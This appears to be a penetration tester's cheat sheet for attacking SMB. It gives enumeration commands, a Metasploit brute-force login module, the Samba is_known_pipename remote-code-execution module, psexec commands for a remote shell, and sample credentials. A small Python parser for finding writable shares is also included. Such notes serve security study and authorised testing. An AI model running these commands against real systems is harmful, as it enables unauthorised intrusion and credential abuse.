SMB uses port 445 on modern Windows systems. In older versions of Windows it runs on port 139 via NetBIOS. Some systems expose SMB on both 445 and 139 for compatibility reasons.
Mapping a share from Windows (the $ suffix denotes an administrative share):
net use <drive letter>: \\<ip address>\<drive letter>$ <password> /user:<username>
We can use -L to list available shares ==> smbclient -L //<ip>/ -U <username>
To login select a share and remove the -L ==> smbclient //<ip>/<shared_folder> -U <username>
nmap -p445 --script smb-enum-users.nse <ip> (requires ANONYMOUS LOGON)

Metasploit SMB modules:

| Module | Description | Other information |
|---|---|---|
| auxiliary/scanner/smb/smb_version | SMB Version Detection | |
| auxiliary/scanner/smb/smb_enumusers | SMB User Enumeration (SAM EnumUsers) | The module itself does not require SMBUser and SMBPass, but the target machine may require credentials before it answers. |
| auxiliary/scanner/smb/smb_enumshares | SMB Share Enumeration | |
| auxiliary/scanner/smb/smb_login | SMB BruteForce | Password list location: set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt |
Other SMB MSF modules can be found with:
search type:auxiliary name:smb
search auxiliary/scanner/smb/
exploit/linux/samba/is_known_pipename
smbmap ==> smbmap -H 192.168.1.100 -u administrator -p smbserver_771
nmblookup
smbclient
rpcclient
enum4linux ==> enum4linux -u administrator -p smbserver_771 192.168.1.100
enum4linux with -a (run all enumeration) ==> enum4linux -a -u administrator -p smbserver_771 192.168.1.100

Samba (affected version range not given here) is vulnerable to a remote code execution vulnerability that allows a malicious client to upload a shared library to a writable share and then cause the server to load and execute it.
There is also an MSF module for it: exploit/linux/samba/is_known_pipename
Set the target to Automatic and run the module.
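The Samba issue above needs a share the client can write to, so the first thing to check on a host is which shares the account in use can write. The following parser is an added example (not from this page's author or from smbmap) that reads the share table smbmap prints and reports writable shares; the output it parses is a constructed sample laid out like smbmap's "Disk / Permissions / Comment" table, not a real scan.

```python
import re
from typing import Dict, List

# Constructed sample of smbmap's share listing (not real scan output).
# The layout mirrors the Disk / Permissions / Comment table smbmap prints.
SAMPLE_SMBMAP_OUTPUT = """\
[+] IP: 192.168.1.100:445\tName: 192.168.1.100
        Disk                                                  \tPermissions\tComment
\t----                                                  \t-----------\t-------
\tADMIN$                                            \tNO ACCESS\tRemote Admin
\tC$                                                \tNO ACCESS\tDefault share
\tIPC$                                              \tNO ACCESS\tRemote IPC
\tbackups                                           \tREAD ONLY\tNightly backups
\tpublic                                            \tREAD, WRITE\tDrop folder
\tscratch                                           \tWRITE ONLY\t
"""

# Permission strings smbmap uses in its table; the regex only matches rows
# that carry one of them, so headers and separator lines are skipped.
PERMISSIONS = ("NO ACCESS", "READ ONLY", "READ, WRITE", "WRITE ONLY")
SHARE_RE = re.compile(
    r"^\s*(?P<share>\S+)\s+(?P<perm>"
    + "|".join(re.escape(p) for p in PERMISSIONS)
    + r")\s*(?P<comment>.*)$"
)


def parse_smbmap(output: str) -> List[Dict[str, str]]:
    """Turn smbmap's share table into a list of {share, perm, comment} dicts."""
    shares = []
    for line in output.splitlines():
        m = SHARE_RE.match(line)
        if not m:
            continue
        shares.append(
            {
                "share": m.group("share"),
                "perm": m.group("perm"),
                "comment": m.group("comment").strip(),
            }
        )
    return shares


def writable_shares(shares: List[Dict[str, str]]) -> List[str]:
    """Names of shares the scanning account can write to (READ, WRITE or WRITE ONLY)."""
    return [s["share"] for s in shares if "WRITE" in s["perm"]]


def audit(output: str) -> Dict[str, List[str]]:
    """Summarise a share listing: what is reachable at all, and what is writable.

    A writable share reachable by a low-privilege account is the precondition
    for the Samba shared-library RCE described above, so it is the finding to
    raise with the share owner.
    """
    shares = parse_smbmap(output)
    return {
        "accessible": [s["share"] for s in shares if s["perm"] != "NO ACCESS"],
        "writable": writable_shares(shares),
    }


if __name__ == "__main__":
    result = audit(SAMPLE_SMBMAP_OUTPUT)
    print("accessible:", ", ".join(result["accessible"]))
    print("writable:  ", ", ".join(result["writable"]))
```

To use it on a real host, pipe the output of the smbmap command from this page into `audit()`; the regex keys on the permission strings only, so extra banner lines in smbmap's output are ignored.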
If we have SMB credentials, we can use the psexec.py script or the MSF psexec module to execute commands or get a shell.
psexec.py <username>:<password>@<target_ip>
exploit/windows/smb/psexec